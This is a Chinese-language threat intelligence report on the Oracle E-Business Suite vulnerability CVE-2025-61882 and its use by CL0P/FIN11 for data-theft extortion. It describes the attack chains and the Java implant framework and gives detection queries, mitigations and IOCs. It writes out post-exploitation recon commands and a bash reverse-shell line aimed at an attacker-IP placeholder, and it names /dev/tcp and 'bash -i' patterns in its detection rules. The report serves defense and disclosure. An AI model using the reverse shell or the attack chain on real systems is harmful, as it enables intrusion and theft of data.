执行摘要
本报告深入分析针对 Oracle E-Business Suite(EBS)的关键漏洞 CVE-2025-61882,以及其在大规模勒索活动中的实际利用情况。该漏洞 CVSS 评分为 9.8(严重级别),影响 Oracle EBS 12.2.3 至 12.2.14 版本,允许未经身份验证的远程攻击者通过 HTTP/HTTPS 协议执行任意代码。根据 Google 威胁情报组(GTIG)和 Mandiant 的调查,攻击者自 2025 年 8 月 9 日起已开始利用这一零日漏洞,远早于 Oracle 在 2025 年 10 月 4 日发布紧急补丁的时间。
CL0P 勒索软件组织已利用该漏洞实施大规模攻击,通过数据窃取与敲诈勒索侵害受害组织。本报告详细阐述漏洞的技术原理、攻击链分析、勒索活动细节及检测防御建议,旨在帮助组织明晰威胁本质,采取适配措施保护自身 EBS 环境安全。
漏洞技术分析
漏洞基本信息
CVE-2025-61882 是影响 Oracle EBS 的严重远程代码执行漏洞,CVSS 3.1 评分为 9.8(严重级别)。该漏洞存在于 Oracle EBS 的 Concurrent Processing BI Publisher Integration 组件中,受影响版本包括 Oracle EBS 12.2.3 至 12.2.14。
根据安全研究人员的观察,该漏洞最早在 2025 年 8 月 9 日就已被攻击者利用,比 Oracle 10 月 4 日发布紧急补丁的时间提前近两个月,为攻击者实施攻击提供了充足的窗口期。
漏洞攻击链分析
CVE-2025-61882 并非单一漏洞,而是由多个安全弱点串联形成的完整攻击链。安全研究人员已识别出至少两条不同的利用路径,分别以 SyncServlet 和 UiServlet 组件为入口。
SyncServlet 攻击链
SyncServlet 攻击链是目前在野攻击中最常见的利用路径,主要分为四个阶段:
阶段 1:身份验证绕过
攻击者向 / OA_HTML/SyncServlet 发送特殊构造的 HTTP POST 请求,利用该组件漏洞绕过身份验证机制。此步骤无需提供有效凭据,即可获取管理员级别的会话权限。经 CrowdStrike 分析确认,至少在一个已核实案例中,该身份验证绕过操作与 EBS 内的管理员账户直接关联。
阶段 2:恶意模板上传
成功绕过身份验证后,攻击者分别向 / OA_HTML/RF.jsp 和 / OA_HTML/OA.jsp 发送 GET 与 POST 请求,上传包含恶意代码的 XSLT 模板。这些模板会被存储至 Oracle EBS 数据库的 xdo_templates_vl 表中,并分配唯一的模板 ID。
阶段 3:代码执行
随后攻击者通过访问以下 URL,触发恶意模板执行:
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<模板 ID>&TemplateType=XSL-TEXT当模板被预览时,BI Publisher 的 XSLT 处理引擎会执行模板中嵌入的命令,实现远程代码执行。这些命令通常会建立从 Java Web 服务器进程到攻击者控制服务器的出站连接(一般使用 443 端口)。
阶段 4:Web Shell 部署
依托已建立的出站连接,攻击者会部署 Web Shell 以执行命令并建立持久化访问。CrowdStrike 分析显示,攻击者通常通过以下两个步骤设置 Web Shell:
首先加载 FileUtils.java 作为下载器
该文件继而加载 Log4jConfigQpgsubFilter.java 作为后门
该 Web Shell 通过 doFilter/filter 链调用,当访问公共端点 / OA_HTML/help/state/content/destination./navId.1/navvSetId.iHelp/ 时,会执行内存中的恶意代码。
UiServlet 攻击链
UiServlet 攻击链是更为复杂的利用路径,需串联利用多个漏洞:
阶段 1:SSRF 触发
攻击者向 /configurator/UiServlet 路径发起请求,通过 getUiType 参数提交恶意 XML。当 redirectFromJsp 参数设置为 true 时,系统会处理该 XML 并提取 return_url 元素值,从而实现服务器端请求伪造(SSRF)。
阶段 2:CRLF 注入
攻击者利用 HTML 编码的换行字符(如 %0D%0A),在 SSRF 请求中注入任意 HTTP 头部,以此操控 HTTP 请求的行为。
阶段 3:HTTP 持久连接利用
攻击者利用 HTTP 持久连接(keep-alive),在同一 TCP 连接上发送多个 HTTP 请求。该技术可提升攻击可靠性,减少网络噪音,降低攻击被检测的概率。
阶段 4:认证过滤器绕过
攻击者采用路径遍历技术(如../ 或 Java 特有的..;/),访问内部绑定至私有 IP 的 7201 端口服务。通过 / OA_HTML/help/../ 路径,可绕过认证过滤器,访问需认证才能获取的资源。
阶段 5:XSLT 执行
最终攻击者利用 / OA_HTML/help/../ieshostedsurvey.jsp 文件的不安全输入处理机制,执行恶意 XSLT 代码,实现远程代码执行。
漏洞利用示例
漏洞利用成功后,攻击者通常会执行以下侦察命令收集环境信息:
cat /etc/fstabcat /etc/hostsdf -hip addrcat /proc/net/arp/bin/bash -i >& /dev/tcp/<攻击者IP>/<端口> 0>&1arp -aifconfignetstat -anping 8.8.8.8 -c 2ps -aux
这些命令可帮助攻击者获取系统配置、网络环境及运行进程情况,为后续横向移动与数据窃取奠定基础。
攻击者恶意软件框架分析
多阶段 Java 植入框架
漏洞利用成功后,攻击者会部署复杂的多阶段 Java 植入框架,主要包含以下组件:
GOLDVEIN.JAVA 下载器
GOLDVEIN.JAVA 是攻击者使用的初始下载器,其伪装为 “TLSv3.1” 握手,向攻击者控制的命令与控制(C2)服务器请求并执行第二阶段载荷。该伪装技术旨在规避网络安全监控系统的检测。
SAGE 系列恶意软件链
SAGE 系列是一组嵌套的 Java 载荷链,具体包括:
-
SAGEGIFT:自定义 Java 反射类加载器,专为 Oracle WebLogic 服务器开发 -
SAGELEAF:内存投放器,基于公开代码构建,用于反射加载 Oracle WebLogic 的 servlet 过滤器 -
SAGEWAVE:恶意 Java servlet 过滤器,支持部署 AES 加密的 ZIP 归档文件
这些组件共同构成复杂的恶意软件框架,使攻击者能够在受害系统上维持持久访问并执行各类恶意操作。
检测与防御
检测方法
针对CVE-2025-61882漏洞利用,我们建议实施多层次检测方法,包括网络层、主机层和日志分析。这种深度防御策略能够在攻击的不同阶段提供检测机会,增加攻击者被发现的可能性。
网络层检测
监控关键 URL 路径的异常访问:包括 / OA_HTML/SyncServlet、/OA_HTML/RF.jsp、/OA_HTML/OA.jsp(尤其包含 TemplatePreviewPG 参数的请求)、/configurator/UiServlet,以及以 / OA_HTML/help/../ 开头的路径遍历尝试
核查与已知恶意 IP 的通信:重点关注 200.107.207.26、185.181.60.11 这两个 IP 地址
识别可疑出站连接:优先监控 EBS 服务器发起的非标准端口(如 53、443)TCP 连接,同时关注包含 /dev/tcp/ 模式的流量
主机层检测
监控可疑进程执行:包括 Java 进程生成的 shell 命令(特别是 /bin/bash -i),以及 cat /etc/hosts、ip addr、netstat -an 等系统侦察命令的组合执行行为
检查数据库中的可疑模板:在 xdo_templates_vl 表中检索包含可疑代码的模板,示例 SQL 查询如下:
SELECT * FROM xdo_templates_vl WHERE template_code LIKE '%exec%' OR template_code LIKE '%Runtime%' OR template_code LIKE '%bash%';3. 审查会话表中的异常活动:检查 icx_sessions 表中 UserID 0(sysadmin)与 UserID 6(guest)的可疑会话,示例 SQL 查询如下:
SELECT * FROM icx_sessions WHERE user_id IN (0, 6) AND creation_date > SYSDATE - 7;日志分析与检测规则
以下是检测 CVE-2025-61882 漏洞利用的日志分析规则:
Splunk 查询:
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*")| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"| table _time host src_ip user uri_path _raw
ELK/Kibana 查询:
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"Sigma 规则:
这个Sigma规则可以转换为多种SIEM平台的查询,用于检测包含/dev/tcp/模式的进程命令行,也是通用的反向shell检测方法。
title: Oracle EBS Reverse Shell via HTTPdetection:selection:EventID: 1234ProcessCommandLine|contains: "/dev/tcp/"condition: selection
主动扫描
使用 Nuclei 扫描工具可主动检测存在 CVE-2025-61882 漏洞风险的系统,扫描命令如下:
nuclei -u http://target-ebs.example.com:8000 -t CVE-2025-61882.yamlnuclei -l targets.txt -t CVE-2025-61882.yaml
缓解措施
紧急修补
立即应用 Oracle 紧急补丁:访问 https://support.oracle.com/rs?type=doc&id=3106344.1 即可获取补丁,且需提前安装 2023 年 10 月的关键补丁更新。
临时缓解措施
若无法立即应用补丁,可先采取以下临时措施:
网络隔离:限制外部对 Oracle EBS Web 端点的访问,仅允许已知 IP 地址建立连接。
Web 应用防火墙(WAF)规则:阻断对关键路径的可疑请求,包括 / OA_HTML/SyncServlet 的异常 POST 请求、包含../ 或..;/ 的路径遍历尝试、包含/dev/tcp/ 或 bash -i 的请求
监控与响应:实施 24/7 持续监控,密切关注可疑活动;提前制定事件响应计划,确保检测到攻击后可快速应对
长期安全策略
定期更新与补丁管理:确保 Oracle EBS 系统按时完成更新与补丁应用
安全评估与渗透测试:定期开展系统安全性评估,主动识别潜在漏洞
事件响应计划制定与测试:制定并测试事件响应计划,保障组织可快速应对安全事件
定期备份维护:建立定期备份机制,确保备份的完整性与可用性,满足必要时的数据恢复需求
勒索活动分析
勒索活动时间线
Oracle EBS 漏洞相关勒索活动的关键时间节点如下:
・2025 年 8 月 9 日:首次监测到 CVE-2025-61882 漏洞利用
・2025 年 8 月 —9 月:攻击者利用该漏洞实施数据窃取
・2025 年 9 月 29 日:启动大规模勒索邮件攻击活动
・2025 年 10 月 3 日:漏洞利用代码在 Telegram 频道泄露
・2025 年 10 月 4 日:Oracle 发布针对该漏洞的紧急补丁
・2025 年 10 月 6 日:CISA 将 CVE-2025-61882 纳入已知被利用漏洞目录
该时间线呈现了从漏洞首次被利用、Oracle 发布补丁至安全研究人员发布分析的完整过程。需要注意的是,攻击者利用该漏洞的时间比补丁发布提前近两个月,给大量组织带来了严重安全风险。
勒索活动细节
自 2025 年 9 月 29 日起,攻击者利用数百乃至数千个已入侵的第三方账户,发起大规模邮件攻击活动。这些邮件以公司高管为目标,声称已入侵其 Oracle EBS 应用并窃取相关文档。
勒索邮件包含两个联系地址:support@pubstorm.com 与 support@pubstorm.net,这两个地址自 2025 年 5 月起已被列入 CL0P 数据泄露网站。攻击者还会提供源自受害者 EBS 环境的合法文件列表作为证据,相关数据可追溯至 2025 年 8 月中旬。
勒索邮件中表示,受害者可通过支付赎金阻止被盗数据泄露,但邮件通常不明确指定具体金额及支付方式。据网络安全公司 Halcyon 披露,攻击者索要的赎金金额高达七至八位数,其中某一笔赎金据称已达 5000 万美元。
受影响行业分布
CL0P/FIN11 勒索活动已影响多个行业,具体分布如下:
・医疗 / 制药行业:28%
・金融服务:23%
・制造业:18%
・零售 / 消费品:15%
・能源 / 公用事业:10%
・其他行业:6%
医疗 / 制药行业与金融服务行业是此次攻击的主要目标,推测原因在于这些行业通常存储大量敏感数据,且业务连续性要求高,支付赎金的意愿相对更强。
全球影响范围
根据 The Shadowserver Foundation 的扫描数据,全球目前仍有约 576 台可能未安装补丁的 Oracle EBS 服务器处于在线状态,地域分布如下:
・美国:32%
・中国:18%
・印度:9%
・英国:7%
・德国:6%
・日本:5%
・其他国家:23%
美国与中国的未安装补丁服务器数量最多,此类系统仍面临被攻击的风险。相关组织需尽快应用 Oracle 发布的紧急补丁,防范潜在攻击。
威胁行为者分析
CL0P/FIN11 组织概述
本次攻击活动与 CL0P 勒索软件存在关联,其背后的威胁行为者疑似为 FIN11 组织。FIN11 是以经济利益为导向的黑客组织,活动历史至少可追溯至 2016 年。该组织初期主要针对金融、零售及餐饮行业,近年来攻击目标已显著扩大,几乎覆盖北美与欧洲的所有行业领域。
攻击归因分析
研究人员尚未正式将此次活动归因于特定威胁组织,但已发现其与 FIN11 过往活动存在多处重合,具体包括:
-
使用 CL0P 勒索软件名称及联系地址 -
后渗透工具与 FIN11 先前活动中使用的恶意软件特征相似 -
用于发送勒索邮件的部分已入侵账户,此前曾被 FIN11 使用
此外,FIN11 与另一知名网络犯罪团伙 TA505 存在显著关联,两者均部署 Clop 勒索软件。这种关联或表明上述组织间存在协作关系或资源共享行为(但 Mandiant 倾向于将二者界定为独立组织)。
历史攻击活动
CL0P 团伙于 2023 年因利用 MOVEit 文件传输软件漏洞引发广泛关注,最终导致包括壳牌(Shell)、英国航空公司(British Airways)、英国广播公司(BBC)在内的 2300 余家组织遭遇数据泄露。美国网络安全与基础设施安全局(CISA)将 Cl0p 定义为 “全球规模最大的网络钓鱼及垃圾邮件分发组织之一”,据估算,该组织已在美国入侵 3000 余家组织,全球范围内入侵数量超 8000 家。
结论与建议
CVE-2025-61882 漏洞构成严重安全威胁,尤其对依赖 Oracle EBS 管理核心业务运营的组织影响显著。该漏洞具备预认证远程代码执行特性,且已证实存在在野利用情况,使其成为攻击者的重要攻击目标。
为有效防御此类威胁,相关组织应采取以下措施:
立即补丁应用:优先部署 Oracle 发布的 CVE-2025-61882 补丁
深度防御构建:部署多层次安全控制措施,涵盖网络隔离、WAF 规则配置及主机防护
持续监控部署:采用本报告提供的检测方法,对系统活动实施持续监控
事件响应准备:制定并测试针对勒索软件攻击的专项事件响应计划
数据备份保障:确保关键数据具备安全离线备份
当前勒索软件攻击的复杂性与针对性持续提升,组织需构建全面的安全防护体系,涵盖技术控制措施、员工安全培训及事件响应计划。尤其需注意的是,组织应密切跟踪 CL0P/FIN11 等威胁行为者的活动动态,并及时部署安全更新与补丁。
未来,针对企业核心应用程序的零日漏洞被用于勒索活动的情况可能进一步增加。相关组织应加大对先进威胁检测及响应能力的投入,同时与安全社区保持密切协作,确保及时掌握新兴威胁及防御策略。
附录 A:已知 IOCs
IP 地址
200.107.207.26
185.181.60.11
文件哈希(SHA256)
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d(oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip)
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121(exp.py)
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b(server.py)
命令模式
sh -c /bin/bash -i >& /dev/tcp// 0>&1
URL 路径
/OA_HTML/SyncServlet
/OA_HTML/RF.jsp
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG
/configurator/UiServlet
/OA_HTML/help/../ieshostedsurvey.jsp
点击阅读原文至ALPHA 8.3
即刻助力威胁研判